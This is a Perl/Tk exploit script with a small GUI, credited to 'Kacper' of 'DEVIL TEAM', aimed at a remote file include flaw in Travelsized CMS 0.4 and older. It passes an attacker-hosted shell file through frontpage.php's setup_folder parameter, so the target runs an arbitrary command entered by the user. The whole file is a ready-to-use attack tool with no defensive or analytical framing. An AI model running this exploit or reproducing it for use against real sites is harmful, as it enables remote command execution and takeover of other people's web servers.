#!/usr/bin/perl
# Travelsized CMS <= 0.4 (frontpage.php) Remote File Include Exploit
# Script name: Travelsized CMS 0.4
# Script site: http://prdownloads.sourceforge.net/uberghey/travelsized-0.4.tar.bz2?download
# Find by: Kacper (a.k.a Rahim)

use Tk;
use Tk::DialogBox;
use LWP::UserAgent;

$mw = new MainWindow(title => "DEVIL TEAM :: Travelsized CMS <= 0.4 (frontpage.php) Remote File Include Exploit :: by Kacper ;-) " );
$mw->geometry ( '500x300' ) ;
$mw->resizable(0,0);
$mw->Label(-text => 'Travelsized CMS <= 0.4 (frontpage.php) Remote File Include Exploit by Kacper',
           -font => '{Verdana} 7 bold',-foreground=>'blue')->pack();
$mw->Label(-text => '')->pack();

$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;

$url = 'http://www.site.com/[Travelsized_path]/frontpage.php?setup_folder=';
$shell_path = 'http://server/shell.txt?';
$cmd = 'ls -la';

$fleft->Label ( -text => 'Script Path: ',
                -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35,
                 -font => '{Verdana} 8',
                 -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'Shell Path: ',
                -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35,
                 -font => '{Verdana} 8',
                 -textvariable => \$shell_path) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'CMD: ',
                -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35,
                 -font => '{Verdana} 8',
                 -textvariable => \$cmd) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fright->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();

$fright->Button(-text => 'Exploit Include Vulnerability',
                -relief => "groove", -width => '30',
                -font => '{Verdana} 8 bold',
                -activeforeground => 'red',
                -command => \&akcja )->pack();

$fright->Label( -text => ' ')->pack();
$fright->Label( -text => 'Exploit coded by Kacper',
                -font => '{Verdana} 7')->pack();

MainLoop();

sub akcja()
{
    $InfoWindow=$mw->DialogBox(-title => 'DEVIL TEAM :: Exploit by Kacper ;-) ',
                               -buttons => ["OK"]);
    $InfoWindow->add('Label', -text => 'Enter to DEVIL TEAM IRC CHANNEL: #devilteam',
                     -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => '',
                     -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => '',
                     -font => '{Verdana} 8')->pack;
    system("start $url$shell_path$cmd");
    $InfoWindow->Show();
}